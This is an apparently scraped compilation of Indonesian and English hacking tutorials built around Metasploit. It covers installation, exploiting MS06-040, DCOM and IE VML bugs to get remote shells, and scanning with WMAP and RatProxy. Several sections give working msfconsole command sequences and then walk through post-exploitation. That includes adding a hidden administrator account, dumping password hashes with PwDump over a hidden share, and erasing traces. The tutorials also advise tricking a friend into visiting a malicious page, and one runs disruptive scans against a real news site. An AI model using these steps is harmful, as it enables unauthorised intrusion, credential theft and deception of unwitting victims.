Tutorial it Framework- Masuk System LaN

of 36/36
Instalasi Metasploit Framework Apa itu Metasploit Framework ? Metasploit Framework adalah sebuah platform pengembangan untuk membuat tool keamanan dan exploit. Metasploit framework digunakan oleh profesional bidang keamanan jaringan untuk melakukan tes penetrasi, digunakan juga oleh administrator sistem untuk memverifikasi instalasi dan patch sistemnya, vendor produk untuk melakukan tes kelemahan dan peneliti- peneliti keamanan lainnya di dunia. Metasploit framework ditulis menggunakan bahasa pemrograman Ruby dan termasuk juga komponen lainnya yang ditulis dalam bahasa C dan assembler. Terdiri dari apa saja? Metasploit Framework terdiri dari tools, libraries, modules dan user interfaces. Fungsi dasar dari metasploit framework adalah memunculkan module, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Jika exploit berhasil, payload akan tereksekusi pada sistem target dan pengguna akan disediakan sebuah shell untuk berinteraksi dengan payload. Download Saat ini tersedia dalam versi 3.0. Dapat didownload di halaman ini : http://framework.metasploit.com/msf/download Instalasi di Ubuntu Saya tidak dapat menemukan paket metasploit ini di repositori nya Ubuntu, jadi harus mendownloadnya langsung dari website nya. Download dan simpan dalam direktori home. Extract file hasil download: [email protected]:~$ tar xvzf framework-3.0.tar.gz [email protected]:~$ cd framework-3.0/ Metasploit framework versi 3.x dan yang sekarang digunakan ditulis dalam bahasa pemrograman Ruby, jadi kita memerlukan Ruby dan Librarynya. Dibawah ini instalasi Ruby dan Library yang kita perlukan.
  • date post

    08-Jun-2015
  • Category

    Documents

  • view

    3.741
  • download

    0

Embed Size (px)

description

lebih lengkapnya visit: http://yuniorusop.blogspot.comhttp://blogsmada.com social network

Transcript of Tutorial it Framework- Masuk System LaN

Instalasi Metasploit FrameworkApa itu Metasploit Framework ? Metasploit Framework adalah sebuah platform pengembangan untuk membuat tool keamanan dan exploit. Metasploit framework digunakan oleh profesional bidang keamanan jaringan untuk melakukan tes penetrasi, digunakan juga oleh administrator sistem untuk memverifikasi instalasi dan patch sistemnya, vendor produk untuk melakukan tes kelemahan dan peneliti-peneliti keamanan lainnya di dunia. Metasploit framework ditulis menggunakan bahasa pemrograman Ruby dan termasuk juga komponen lainnya yang ditulis dalam bahasa C dan assembler. Terdiri dari apa saja? Metasploit Framework terdiri dari tools, libraries, modules dan user interfaces. Fungsi dasar dari metasploit framework adalah memunculkan module, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Jika exploit berhasil, payload akan tereksekusi pada sistem target dan pengguna akan disediakan sebuah shell untuk berinteraksi dengan payload. Download Saat ini tersedia dalam versi 3.0. Dapat didownload di halaman ini : http://framework.metasploit.com/msf/download Instalasi di Ubuntu Saya tidak dapat menemukan paket metasploit ini di repositori nya Ubuntu, jadi harus mendownloadnya langsung dari website nya. Download dan simpan dalam direktori home. Extract file hasil download: [email protected]:~$ tar xvzf framework-3.0.tar.gz [email protected]:~$ cd framework-3.0/ Metasploit framework versi 3.x dan yang sekarang digunakan ditulis dalam bahasa pemrograman Ruby, jadi kita memerlukan Ruby dan Librarynya. Dibawah ini instalasi Ruby dan Library yang kita perlukan. [email protected]:~/framework-3.0$ sudo apt-get install ruby [email protected]:~/framework-3.0$ sudo apt-get install libzlib-ruby [email protected]:~/framework-3.0$ sudo apt-get install libopenssl-ruby Metasploit framework sudah bisa digunakan, untuk mengeksekusi nya gunakan perintah : [email protected]:~/framework-3.0$ sudo ./msfconsole Password:

# # ###### ##### ## #### ##### # #### # ##### ## ## # # # # # # ###### # ## # ##### # # # #### # ###### # # # # ###### # ##### ##### ######### ##### # # ###### # # # #### # ###### #### # # =[ msf v3.0 + -- --=[ 176 exploits - 104 payloads + -- --=[ 17 encoders - 5 nops =[ 30 aux msf > Sampai tahap ini metasploit berjalan OK, terkecuali jika kita ingin menggunakan dalam bentuk web nya (web interface dari metasploit). Jika kita eksekusi ./msfweb maka masih akan kita temukan eror. Coba ikut petunjuk instalasi dibawah ini dan jangan lupa sebelumnya paket apache sudah harus terinstal di sistem kita. [email protected]:~/framework-3.0$ sudo apt-get install rubygems [email protected]:~/framework-3.0$ sudo ./msfweb [*] Starting msfweb v3.0 on http://127.0.0.1:55555/ Cannot find gem for Rails ~>1.2.2.0: Install the missing gem with 'gem install -v=1.2.2 rails', or change environment.rb to define RAILS_GEM_VERSION with your desired version.

[email protected]:~/framework-3.0$ sudo gem install -v=1.2.2 rails Bulk updating Gem source index for: http://gems.rubyforge.org Install required dependency rake? [Yn] y Install required dependency activesupport? [Yn] y Install required dependency activerecord? [Yn] y Install required dependency actionpack? [Yn] y Install required dependency actionmailer? [Yn] y Install required dependency actionwebservice? [Yn] y Successfully installed rails-1.2.2 Successfully installed rake-0.7.3 Successfully installed activesupport-1.4.1 Successfully installed activerecord-1.15.2 Successfully installed actionpack-1.13.2 Successfully installed actionmailer-1.3.2 Successfully installed actionwebservice-1.2.2 Installing ri documentation for rake-0.7.3... Installing ri documentation for activesupport-1.4.1... Installing ri documentation for activerecord-1.15.2... Installing ri documentation for actionpack-1.13.2... Installing ri documentation for actionmailer-1.3.2... Installing ri documentation for actionwebservice-1.2.2... Installing RDoc documentation for rake-0.7.3... Installing RDoc documentation for activesupport-1.4.1... Installing RDoc documentation for activerecord-1.15.2... Installing RDoc documentation for actionpack-1.13.2...

Installing RDoc documentation for actionmailer-1.3.2... Installing RDoc documentation for actionwebservice-1.2.2... [email protected]:~/framework-3.0$ sudo ./msfweb [*] Starting msfweb v3.0 on http://127.0.0.1:55555/ => Booting WEBrick... => Rails application started on http://127.0.0.1:55555 => Ctrl-C to shutdown server; call with --help for options [2007-12-12 17:26:15] INFO WEBrick 1.3.1 [2007-12-12 17:26:15] INFO ruby 1.8.5 (2006-08-25) [x86_64-linux] [2007-12-12 17:26:15] INFO WEBrick::HTTPServer#start: pid=2833 port=55555 Biarkan program msfweb berjalan di terminal, jika ingin menghentikan cukup gunakan CtrlC. Buka browser dan ketik di url http://127.0.0.1:55555

[TUTORIAL] METASPLOIT FRAMEWORKhttp://sepri18.wordpress.com/ yg dibutuhkan: 1. Tentu saja Metasploit Framework (berapapun versinya) (cari di google) 2. IP Scanner ex: superscan4 3. Paling utama adalah Target pada jaringan LAN langkah pertama: Scan IP target menggunakan IP Scanner. Disini target yg menggunakan port 135, karena yg paling mudah dimasukinhiks Setelah target didapat, jalankan langkah kedua dibawah ini Contoh: IP KITA : 192.168.10.8 IP Target: 192.168.10.9 Langkah kedua: jalankan metasploit Start >> Program>>metasploit >>MSFConsole praktekin code dibawah ini: Code:

[*] Starting the Metasploit Framework | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| + =[ msfconsole v2.7 [157 exploits - 76 payloads] msf > use netapi_ms06_040 msf netapi_ms06_040 > set PAYLOAD win32_bind PAYLOAD -> win32_bind msf netapi_ms06_040(win32_bind) > set LPORT 4444 LPORT -> 4444 msf netapi_ms06_040(win32_bind) > set RHOST 192.168.10.9 RHOST -> 10.33.196.163 msf netapi_ms06_040(win32_bind) > set EXITFUNC thread EXITFUNC -> thread msf netapi_ms06_040(win32_bind) > exploit [*] Starting Bind Handler. [*] Detected a Windows 2000 target [*] Sending request [*] Got connection from 192.168.10.8:1148 192.168.10.9:4444 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32>

jika sama dengan code diatas, berarti anda berhasil masuk ke system target. lihat User account Komp Target: C:\WINNT\system32>net user net user Code:

User accounts for \\ Administrator Guest SERVER-w4w4n SERVER Hebat TsInternetUser The command completed with one or more errors.membuat account: contoh: user : xcode pass: 123456 C:\WINNT\system32>net user xcode 123456 /ADD net user xcode 123456 /ADD The command completed successfully. Untuk jadi administrator: C:\WINNT\system32>net localgroup administrators xcode /ADD net localgroup administrators xcode /ADD The command completed successfully. jika semua sukses - ketik C:\WINNT\system32>net user cari account yg anda buat tadi, ada apa tidak? - Jika ada, ketik C:\WINNT\system32>net user xcode pada baris bawah sendiri, apa ada tulisan: Local Group Memberships *Administrators *Users Global Group memberships *None The command completed successfully. Jika ada

BackTrack 2 Final : how to make Fake Access Points with fakeap.plWEP Cracking tutorial , you must have been familiar with the words Wardriving , SSID , BSSID , Access Point , etc . Now Im not going to teach you how to be on the Attacker-side , but itll be more into Defender-side. Imagine that you were an administrator of the wireless network of your office , and you dont want to find any intrusion to your wireless network , or lettin somebody use your Access Point without appropriate privillige , and you dont want your boss to kick your Ass out of your job. So here it is , i will tell you one of many ways to prevent intrusions into your Access Points , in this tutorial we will try to make the attacker / wardriver gets confused by serving TONS of fake Access Points ! The attacker will see lots of Fake Available Access Points on their Scanner Tools (ex: NetStumbler or kismet) . And it will make the attackers spend more times trying to penetrate them one by one , or otherwise, theyll just give up ! (perhaps). Requirements : - a Laptop with BackTrack 2 Final , thatll be enough dude! Steps: 1. Fire up your console , and change your wireless network interface to master mode by typing these commands : iwconfig eth1 mode master 2. Next , run your fakeap.pl script which is located in /pentest/wireless/fakeap-0.3.2/ by specifying parameters : perl fakeap.pl interface -channel ex: perl fakeap.pl interface eth1 -channel X http://imageh4ck.com/public/pview/237/fake2.PNG 3. Then youll see tons of Access Points being set up by fakeap.pl : http://imageh4ck.com/public/thumb_468d1f8795ba7619544857.jpg 4. Done. have phun !

BackTrack 2 Final : Metasploit 3 how to (short introduction)If you dont even know what Metasploit is, Metasploit is a framework which includes a large of exploits archives inside of it therefore we could use it instantly to penetrate our vulnerable target , or we could even use Metasploit to develop a new exploit! (kewl,isnt it ?). Instead of built independently, Metasploit s aslo already built on BackTrack Live CD, especially BackTrack 2 final which includes Metasploit 3 (which is the newest version of it) inside of it. Actually , Metasploit has already given the ease of its use , since Metasploit could be run on web based environment. But in this tutorial , i am not going to teach you how to use the Metasploit web environment , i am going to teach you how to use the Metasploit 3 console based. :) Well , in this tutorial , ill be running my Metasploit under SSH DEBIAN 4 environment (dont worry , youll be able to implement this tutorial in Windows environment too ). First of all , lets load our msfconsole program , which is located under /home/arie/l4m3/framework-3.0 (in my case) , it will bring you to the beginning user interface of Metasploit 3: http://imageh4ck.com/public/pview/244/2.JPG And then , list all available exploits in Metasploit 3 by using show exploits command : http://imageh4ck.com/public/pview/245/3.JPG Choose your desired exploit , in this case ill be using MSRPC DCOM exploit , use use command to choose : http://imageh4ck.com/public/pview/246/4.JPG After choose the desired exploit , now you can see the list of all available payloads of the exploit , by using show payloads command : http://imageh4ck.com/public/pview/248/6.JPG To select the payload , use the set PAYLOAD command : http://imageh4ck.com/public/pview/249/7.JPG Each payload has its own required options you have to fill , it should be RHOST (which is the target s ip) and LHOST (your local ip address) , example : set RHOST 10.126.134.23 , set LHOST 10.126.134.22 . after youve specified the required options , now just type exploit . And Metasploit will work for you! (below is the screenshot of the failed attack , the target hosts patched i think) Thats all.

Hacking Learning with Metasploit bagi yang mau blajar hacking langsung tanya ma mas yang punya artikel di atas...makasih mas you...loe baek banget...hehehehehe Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied. Setelah mengetahui sedikit dan konsep dasar standar mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2. Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ? The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research. Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan limited user tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya. Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!! Pertama2 jalankan mfsconsole!

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah help. Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution. This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2. Untuk melihat info dari exploit ini gunakan perintah : msf > info ie_vml_rectfill Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit social engineering, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit bekerja. Setelah beberapa saat bilang aja wah.. ada error nih. Ok deh.. saya coba betulin dulu makasih ya. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-end process-kan dumpred.exe juga, tapi setelah exploit bekerja ). Untuk menggunakan exploit gunakan perintah2 berikut dalam console : msf > use_ie_vml_rectfill msf > set PAYLOAD win32_reverse msf > set RHOST ip_target msf > set LHOST ip_penyerang msf > exploit

Hasilnya akan tampak seperti gambar berikut :

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu payload yang digunakan adalah win32_reverse dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah exploit, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus Jika anda berhasil, maka anda akan mendapatkan cmd.exe dari komputer target. Crack da Password! Nah, setelah kita menguasai komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus menyediakan program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user biasa, pwdump tidak akan berhasil! Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran $ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan net use. Contoh perintah yang digunakan :

Setelah itu copy Pwdump ke komputer target dalam folder sementara, temp. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah C:\temp\Pwdump o pass.txt 127.0.0.1 Klo berhasil akan tampak pada gambar berikut.

Lalu copy file pass.txt ke komputer kita C:\temp\copy pass.txt z: Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh. (baca artikel sebelumnya buat nge-crack password). Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat menyenangkan untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik. Happy Hacking.. Beberapa saran agar windows kita tetap aman terhadap exploit diatas. 1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!. 2. Patch Windows anda. 3. Gunakan antivirus dengan update terbaru 4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p Reference : http://www.metasploit.com

info hacker : Cara Hacking dengan MetasploitRasa penasaran saya muncul ketika banyak forum security membicarakan tentang Metasploit. Apakah itu metasploit ? Sulitkah menggunakannnya ? Saatnya membuka sedikit rahasia para Lamer (Hacker kelas teri) yang seringkali menyombongkan diri, padahal yang mereka lakukan hanyalah menggunakan tools yang dapat digunakan oleh anak SMP sekalipun. Untuk memberikan gambaran dan mempermudah penjelasan, saya akan memberikan contoh bug pada service DCOM Windows yang dulu sangat populer dimanfaatkan oleh teman-teman SMA saya dengan exploit terpopuler saat itu : KAHT (dimana saya tidak tertarik hacking pada waktu itu) untuk menembus Server Lab sekolah - yang akhirnya ketahuan dan dimarahi guru Lab .Feeling saya sih mereka berusaha mengambil soal ulangan yang diketik di server, dasar anak bandel, hehehe. Berikut alat-alat praktek yang kita butuhkan pada percobaan kali ini : 1. Sebuah PC yang cukup bertenaga untuk virtualisasi PC. 2. Metasploit Framework, dapat di download disini. 3. Microsoft Windows NT SP3-6a/2000/XP/2003 yang memiliki bug pada service DCOM. 4. Vmware, dapat di download disini. Vmware disini digunakan untuk membuat virtualisasi jaringan komputer, sehingga memudahkan anda yang hanya memiliki 1 PC saja dirumah. Saya akan melompati langkah-langkah menginstall VMware dan juga cara menginstall Windows di VMware, sebab apabila anda tidak mengerti hal tersebut, kemungkinan besar anda juga tidak akan paham yang kita bahas disini. Sebagai permulaan kita akan memulai dengan mengenal lebih dekat Metasploit Framework. Pada situs pembuatnya dipaparkan secara gamblang tentang apa itu Metasploit framework, dan juga tujuan penggunaannya :

What is it?The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.

What does it do?The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload. Semuanya saya biarkan tertulis dalam bahasa orang bule sebab ada kata-kata yang tidak pas atau tidak bisa dipadankan bila diterjemahkan dalam Bahasa Indonesia. Selanjutnya untuk lebih jauh tentang exploit maupun bug pada DCOM service dapat anda search sendiri di google, sebab terlalu panjang jika saya jelaskan disini. Sekarang mari kita ngoprek komputer !

Langkah pertama adalah download Vmware dari situsnya, lalu anda dapat mulai menginstall Windows yang memiliki bug DCOM, kemudian jalankan windows anda di VMware !

Langkah kedua adalah download Metasploit Framework dari situsnya. Lalu install dikomputer anda dan jalankan, hingga keluar tampilan seperti berikut :

Kemudian pada kotak search ketikan dcom, lalu klik Find, dan pilihlah Exploits Microsoft RPC DCOM Interface Overflow.

Setelah itu kita memilih target yang akan kita exploitasi, dalam kasus kali ini Sistem Operasi target kita adalah Windows XP home, oleh karena itu pilihlah yang sesuai, lalu klik Forward :

Kemudian kita dihadapkan pada pilihan payload. Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi oleh Metasploit. Untuk pembelajaran, kita pilih Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind atau lebih dikenal di lingkungan windows dengan Command Prompt dari target hacking kita. Setelah itu klik Forward.

Langkah berikutnya kita harus menentukan Target Address kita, disini saya telah mengkonfigurasi Windows XP Home di Vmware dengan IP 192.168.126.132, oleh karena itu tuliskan ip tersebut pada kolom RHOST. Sedangkan RPORT disini sudah ditentukan yaitu port 135 yang merupakan port default dari service DCOM dimana secara default dibuka oleh Windows XP Home ! Wah, berbahaya sekali yah Untuk LPORT disini juga sudah ditentukan yaitu 4444, Local Port akan membuka sebuah port di PC anda untuk berhubungan dengan komputer target. Selanjutnya klik Forward .

Setelah semua konfigurasi selesai, anda akan mendapatkan pesan konfirmasi seperti berikut, jika anda yakin semuanya telah benar,lanjutkan dengan klik Apply.

Jika target berhasil terexploitasi, anda akan mendapatkan sebuah session yang berisi target hacking kita dan siap untuk di double klik.

Kemudian anda akan mendapati sebuah layar Command Prompt dari komputer target dan anda sebagai Administrator. Jika sudah begini semua terserah anda, jangan tanyakan apa yang bisa dilakukan selanjutnya.Dan selesailah tutorial hacking kali ini Mudah bukan ?

WMAP: Metasploit + RatProxy + SQlite3Filed under: Exploit, Tips 'n Trick, Tools Review, Websecurity byteskrew @ 4:12 am

Mungkin masih ada yang belum tahu bahwa metasploit saat ini mendukung cukup banyak feature, salah satunya adalah wmap. WMAP merupakan web application framework yang digunakan untuk proses scanning suatu website dengan memanfaatkan metasploit framework. WMAP sendiri masih terbilang baru sehingga masih banyak hal-hal yang belum ditambahkan, proses scanning pun masih dilakukan dengan cara sederhana namun konsepnya cukup baik sehingga kita dapat ikut melakukan kustomisasi terhadap modul-moudul yang akan digunakan. Dokumentasi mengenai WMAP dapat ditemukan pada paket Metasploit, atau bisa dilihat langsung secara online disini. Dan seperti biasa, kita akan mulai pembahasan dari konsep hingga implementasi. Bagi kalian yang terbiasa melakukan audit ataupun scanning terhadap suatu aplikasi web pasti sudah terbiasa dengan istilah spider. Web scanner umumnya memiliki kemampuan untuk mengumpulkan informasi sebanyak-banyaknya dari target melalui seluruh link yang ditemukan mulai dari halaman index hingga halaman-halaman terdalam lainnya. Web scanner tersebut akan melakukan audit terhadap link-link yang ditemukan dan dicocokan hasilnya dengan informasi vulnerability dalam database tools tersebut. WMAP pada metasploit bekerja dengan metode yang mirip namun memanfaatkan aplikasi-aplikasi opensource. WMAP merupakan salah satu plugin (yup, salah satu, masih ada beberapa plugin lainnya) metasploit yang dapat di load pada msfconsole dimana melalui msfconsole tersebut user dapat berinteraksi dengan metasploit framework. Berikut ini konsep WMAP pada metasploit: 1. RatProxy

Metasploit memanfaatkan RatProxy sebagai proxy yang akan menangkap seluruh data request-response antara web client dengan web server. Informasi tersebut akan dimasukan ke suatu database (sqlite3) untuk kemudian digunakan oleh modul-modul WMAP. RatProxy sendiri merupakan hasil karya hacker Michal Zalewski yang merupakan opensource tools untuk audit web application. RatProxy tidak memiliki dukungan terhadap penyimpanan data kedalam bentuk database, oleh karena itu sebelum dapat digunakan oleh WMAP maka RatProxy harus di-patch terlebih dahulu. Patch bisa didapatkan dari bundle metasploit: external/ratproxy/ratproxy_wmap.diff 2. SQLite3 SQLite merupakan produk database yang diklaim small, fast, reliable. SQLite umumnya digunakan oleh aplikasi-aplikasi yang membutuhkan database sebagai tempat penyimpanan dan pemrosesan data yang sederhana. Contoh penggunaannya adalah pada iPhone dimana sqlite digunakan untuk menyimpan data SMS. Metasploit sendiri memiliki driver yang dapat berkomunikasi dengan 3 produk database, MySQL, PostgreSQL, dan SQlite3. Implementasi WMAP memanfaatkan SQLite3. 3. WMAP WMAP merupakan plugin metasploit untuk web application framework audit. Saat tulisan ini dibuat versi stable metasploit adalah 3.2, dan modul-modul yang dapat digunakan oleh WMAP antara lain: WMAPScanServer, WMAPScanDir, WMAPScanUniqueQuery, dll. Jika kalian menggunakan Backtrack 3 final, maka support terhadap metasploit sudah sangat baik. Requirement yang dibutuhkan oleh metasploit telah terpenuhi dan plugin-pluginnya dapat di-load dengan mudah. Namun beberapa sistem operasi lain umumnya membutuhkan beragam metode sebelum dapat memanfaatkan feature-feature pada metasploit framework. Untuk plugin WMAP ini, seperti yang telah disebutkan diatas, dibutuhkan RatProxy dan SQlite3 berjalan dengan baik sebelum me-load WMAP. Pada contoh dibawah ini saya menggunakan sistem operasi OS X yang membutuhkan beberapa data tambahan untuk memuaskan persayaratan yang dibutuhkan oleh WMAP, diantaranya yang terpenting dibutuhkan flare khusus (bukan bawaan dari RatProxy) yang kompatibel dengan MacOSX. Flare merupakan tools yang digunakan untuk proses decompiler action script flash. (1). Buat database wmap_test.db melalui plugin database metasploitmsf [*] [*] [*] > db_create /Users/staff/wmap_test.db Creating a new database instance... Successfully connected to the database File: /Users/staff/wmap_test.db

(2). Bagi kalian yang memiliki rasa penasaran tinggi tentu ingin melihat seperti apa bentuk database yang dibuat oleh plugin database metasploit tersebut. Database yang telah dibuat dapat kita lihat schema-nya secara langsung menggunakan SQLite.k-elektronik:~ staff$ sqlite3 wmap_test.db SQLite version 3.4.0 Enter ".help" for instructions sqlite> .tables hosts refs requests targets notes reports services vulns sqlite> .schema requests

vulns_refs

CREATE TABLE requests ( 'host' VARCHAR(20), 'port' INTEGER, 'ssl' INTEGER, 'meth' VARCHAR(20), 'path' BLOB, 'headers' BLOB, 'query' BLOB, 'body' BLOB, 'respcode' VARCHAR(5), 'resphead' BLOB, 'response' BLOB, 'created' TIMESTAMP );

(3). Setelah urusan database selesai, maka selanjutnya menjalankan aplikasi RatProxy yang sebelumnya telah di-patch agar dapat menyimpan seluruh data request-response ke database wmap_test.dbk-elektronik:ratproxy staff$ ./ratproxy -v /Users/staff/ -b wmap_test.db -d detik.com -xtifkgmjscael2XCr ratproxy version 1.51-beta by [*] Proxy configured successfully. Have fun, and please do not be evil. WARNING: Disruptive tests enabled. use with care. [+] Accepting connections on port 8080/tcp (any source)...

(4). RatProxy diatas menggunakan port default, yaitu 8080. Yang berarti pada mesin tersebut dibuka port 8080 dan akan bertindak sebagai proxy server. Sisanya adalah kita melakukan browsing secara manual ataupun menggunakan automatic tools dengan memanfaatkan port 8080 itu sebagai proxy server. Hasil dari browsing seluruhnya akan di log oleh RatProxy kedalam database wmap_test.db (5). Sekali lagi, bagi yang penasaran apakah RatProxy benar-benar menyimpan hasilnya pada database yang telah kita buat sebelumnya, dapat memanfaatkan sqlite3.sqlite> select host,meth,headers from requests; 202.158.66.94|GET|User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q =0.8,image/png,*/*;q=0.5 Accept-Language: en-us Accept-Encoding: gzip, deflate Cookie: __utma=146380193.1809118446.1213005860.1213005860.1213005860.1 Connection: keep-alive Proxy-Connection: keep-alive Host: detik.com 202.158.66.94|GET|User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 Referer: http://detik.com/ Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate Cookie: __utma=146380193.1809118446.1213005860.1213005860.1213005860.1 Connection: keep-alive Proxy-Connection: keep-alive Host: detik.com

(6). Berikutnya kita akan melihat bagaimana wmap bekerja. Pada langkah pertama tadi kita telah membuat database wmap_test.db melalui msfconsole sekaligus connect ke database tersebut secara otomatis menggunakan plugin db_sqlite3. Maka selanjutnya yang dibutuhkan adalah load plugin wmap untuk kemudian membaca database wmap_test.db tersebut.msf > load db_wmap [*] =[ WMAP v0.3 - ET LoWNOISE [*] Successfully loaded plugin: db_wmap msf > wmap_targets -p [*] Id. Host Port SSL [*] Done. msf > wmap_targets -r wmap_targets -p [*] Id. Host Port [*] => 1. 202.158.66.94 [*] 2. 202.158.66.164 [*] 3. 202.158.66.86 [*] 4. 202.158.66.20 [*] 5. 202.158.66.190 [*] 6. 202.158.66.54 [*] 7. 202.158.66.24 [*] 8. 64.233.183.127 [*] Done. msf > wmap_website [*] Website structure [*] 202.158.66.94:80 SSL:0 ROOT_TREE +------favicon.ico | js | +------swfobject.js | +------openwin11.js | +------etc.js | +------expandbannerall.js.html | +------contentslider.js | +------tabcontent.js SSL

80 80 80 80 80 80 80 80

| +------jquery-1.2.6.min.js [*] Done. msf > wmap_targets -s 2 msf > wmap_website [*] Website structure [*] 202.158.66.164:80 SSL:0 ROOT_TREE | images | +------telkomsel-280x175.gif | +------banner-detik-rev-final.gif | +------1x1.gif | +------promocontinue_4.swf | delivery | +------spcjs.php | +------lg.php | +------spc.php | +------fl.js [*] Done. msf > wmap_targets -s 3 msf > wmap_website [*] Website structure [*] 202.158.66.86:80 SSL:0 ROOT_TREE | css | +------allslider.css | +------detikcom.css | +------pollingsmsorange02.css | +------alltabs.css | images | | content | | | blog | | | | | | | | +------20081219172849_blog.jpg | | | | +------20081219115448_blog.jpg | | | | +------20081219134455_blog.jpg | | | 2008 | | | | 12 | | | | | 22 | | | | | | 71 | | | | | | +------SpallettiAFP-cov.jpg | | | | | | +------ranieri-cov.jpg | | | | | | 72 | | | | | | +------ArsenalPool-EddieKeogh200.jpg | | | | | | 73 | | | | | | +------vandersar-cover.jpg | | | | | | 75 | | | | | | +------Sevilla-Reuters200.jpg | | | | | | +------BarcaDiegoTusonAFP-cov.jpg | | | | | | 10 | | | | | | +------wir-cover.jpg | | | | | 21 | | | | | | 648 | | | | | | +------toyota-depan.JPG | | | | | | 288 | | | | | | +------RumahDurian.jpg | | | | | | 157 | | | | | | +------coverpknu.jpg | | | | | | +------coverateror.jpg | | | | | | +------coverpolis.jpg | | video | | | 